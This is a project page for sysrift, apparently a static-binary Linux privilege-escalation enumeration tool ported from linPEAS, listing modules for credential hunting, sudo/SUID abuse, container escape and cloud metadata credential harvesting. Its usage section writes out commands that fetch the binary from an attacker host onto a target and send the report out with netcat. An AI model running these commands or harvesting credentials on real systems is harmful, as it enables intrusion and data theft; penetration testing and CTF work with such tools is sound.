shards.info
sysrift
sysrift
A Linux privilege escalation enumeration tool compiled to a single static binary. Ported from linPEAS and rewritten in Crystal for drop-and-run deployment with no runtime dependencies.
Why
linPEAS is the standard for Linux privesc enumeration, but it's a ~35,000 line Bash script that requires an interpreter, generates process noise, and buries findings in verbose output. sysrift addresses this:
- Single static binary -- drop in
/dev/shm, run, delete. No interpreter, no dependencies. - Selective execution -- run individual modules or combinations instead of a full sweep every time. Active checks (network connections, auth attempts) require explicit opt-in per execution via interactive prompt.
- Severity-tagged output --
[!]critical,[+]medium,[-]info,[ok]safe. Post-run summary surfaces only critical and medium findings. - Smaller footprint -- one process, one log file. Self-destruct option removes the binary when done.
- Cross-architecture -- x86_64 and arm64 via static musl linking.
Modules
[A] = includes active checks (opt-in via interactive prompt). See ARCHITECTURE.md for design details, DETECTION.md for detection logic and CVE coverage.
| # | Module | What it checks |
|---|---|---|
| 1 | System Information | Identity, kernel version + CVE registry with distro backport detection, interesting groups, env vars, PATH and interpreter library path hijacking, mount flags, fstab credentials |
| 2 | SUID / SGID Binaries | GTFOBins cross-reference, writable binaries, SGID group context, shared library injection analysis, PATH hijack on non-standard SUIDs |
| 3 | Sudo Rights | sudo -l + sudoers enumeration, NOPASSWD/GTFOBins/env_keep, sudo CVEs, pivot target analysis, doas.conf, token reuse |
| 4 | Credential Hunting | Shell history, config files, secret-pattern scanning, shadow/passwd hashes, sshd config, PAM/LDAP, Kerberos tickets and keytabs, browser credential stores, password manager DBs, self-hosted app configs (Jenkins/Grafana/GitLab/Mattermost/Gitea/Cacti/Froxlor/ISPConfig/TeamCity/Duplicati/Portainer), database credential files, exposed .git in web roots, PHP sessions, wifi credentials, Terraform state, Docker/Kubernetes configs, GPG private keys, certificates and keystores |
| 5 | Writable Files & Dirs | Privileged system files (passwd/shadow/sudoers/ld.so.preload/binfmt_misc/ld.so.conf), profile.d, update-motd.d, logrotate abuse, ACL enumeration, world-writable directories |
| 6 | Network Information | Interfaces, routes, listening ports, /etc/hosts, ARP, forwarding, legacy r-commands trust, firewall rules |
| 7 | Processes, Cron & Timers [A] |
Root processes with writable binaries, cron analysis (wildcards, writable targets, redirects), crontab-ui service detection, systemd timers, chroot detection, open FDs, /proc environ harvesting. Active: process sampling for hidden cron discovery |
| 8 | File Capabilities | Dangerous file capabilities, cap+binary combo detection, process capability enumeration via /proc |
| 9 | NFS Shares | /etc/exports no_root_squash, showmount, active NFS mounts |
| 10 | Container / Docker | Container detection (Docker/LXC/Kubernetes/Podman/containerd/CRI-O), runtime sockets, privileged mode, escape surfaces, namespace isolation, MAC profiles, runtime CVEs, host mount writability, user namespace mapping. Kubernetes: service account token, RBAC analysis, resource enumeration |
| 11 | Installed Software [A] |
Compilers, transfer tools, web servers, internal service detection, Logstash config RCE surface, database services, vulnerable software CVEs with backport detection, AD membership, sshd_config, screen/tmux session hijacking. Active: database default credential testing |
| 12 | Users & Groups | Password policy, UID 0 backdoor users, shell users, groups, login history, readable home dirs, SSH keys |
| 13 | Services | Running/enabled services, writable systemd units and timers, systemd PATH hijack, writable init.d scripts |
| 14 | Interesting Files | Sensitive configs, backups, non-standard SUIDs, credential patterns in logs, recently modified files |
| 15 | Security Protections | AppArmor, SELinux, ASLR, kernel hardening sysctls, lockdown mode, grsecurity/PaX, loaded kernel modules, permissive /dev devices |
| 16 | D-Bus / PolicyKit | PolicyKit JS rules, writable pkexec/D-Bus binaries, config directory writability |
| 17 | Cloud Environment [A] |
Cloud provider detection (AWS/GCP/Azure/DigitalOcean/IBM), CLI tools, credential files. Active: IMDS harvest for IAM credentials, tokens, user data |
Build
Requires Crystal 1.19+.
# Static x86_64 binary (recommended — no Docker required)
make x86_64-native
# Strip symbols (~30-40% size reduction)
make strip-native
# Native build (dynamic, for testing)
make local
# Static x86_64 binary via Docker (alternative)
make x86_64
# Static arm64 binary via Docker + QEMU
make arm64
# Syntax/type check only (no binary output)
make check
Prerequisites
| Target | Requires |
|---|---|
make x86_64-native |
Crystal + musl-gcc (apt install musl-tools) |
make local |
Crystal installed natively |
make x86_64 |
Docker + crystallang/crystal:latest-musl |
make arm64 |
Docker + QEMU binfmt (sudo apt install qemu-user-static binfmt-support) |
Output binaries are placed in dist/.
Usage
# Serve from attack box
python3 -m http.server 8080 -d dist/
# Drop to target (pick one)
curl http://<attacker>:8080/linaudit_x86_64_native -o /dev/shm/linaudit
wget http://<attacker>:8080/linaudit_x86_64_native -O /dev/shm/linaudit
scp dist/linaudit_x86_64_native user@target:/dev/shm/linaudit
# Run
chmod +x /dev/shm/linaudit && /dev/shm/linaudit
The interactive menu lets you:
- Run individual modules by number (e.g.,
1for System Information) - Run multiple modules with comma separation (e.g.,
1,3,5) - Run all modules with
0 - List report files with
r - Self-destruct the binary with
x(keeps report files)
Output is tee'd to a timestamped log file in /dev/shm/ with ANSI codes stripped:
# View report
less -R /dev/shm/audit-report_<user>_<timestamp>.txt
# Copy off target
nc <remote-ip> 4444 < /dev/shm/audit-report_<user>_<timestamp>.txt
Status
Active work-in-progress (v0.4.0 — coverage-parity release; also in src/menu.cr banner and shard.yml). All 17 modules are functional. See ARCHITECTURE.md for design details and DETECTION.md for detection logic.
Known Limitations
-
No 32-bit (i686) support. Crystal does not target 32-bit architectures. The binary fails with "Exec format error" on i686 systems -- a good example is HTB's retired Irked box (Debian 8, i686, kernel 3.16.0-6-686-pae). This is where interpreted tools like linPEAS win outright. Debian has dropped 32-bit ISOs and i686 is increasingly rare, but legacy infrastructure and older CTF boxes still run it.
-
make x86_64-nativecurrently links against glibc, not musl. The target name implies musl-static but the build command (crystal build --static --link-flags "-static") uses the systemcctoolchain. On a glibc-based dev host, the resulting binary is glibc-static and emits compile-time warnings fordlopen,getaddrinfo, andgethostbyname(pulled in bymod_cloud'shttp/clientfor IMDS). At runtime the binary will demand the linker's glibc version on the target -- defeating the drop-and-run premise on systems with older glibc. Until this is fixed, ship themake x86_64(Dockercrystallang/crystal:latest-musl) build, notmake x86_64-native.
Legal
This tool is intended for authorized penetration testing, security research, and CTF competitions. Unauthorized use against systems you do not own or have explicit written permission to test is illegal. The author assumes no liability for misuse.
Acknowledgements
sysrift is a port of linPEAS by Carlos Polop, part of the PEASS-ng project. sysrift does not replicate every linPEAS check -- it focuses on the highest-signal vectors post-foothold, structured for selective execution rather than full-sweep output.
sysrift
- 8
- 0
- 0
- 0
- 1
- about 8 hours ago
- March 31, 2026
GNU Lesser General Public License v3.0
Sun, 26 Apr 2026 13:04:00 GMT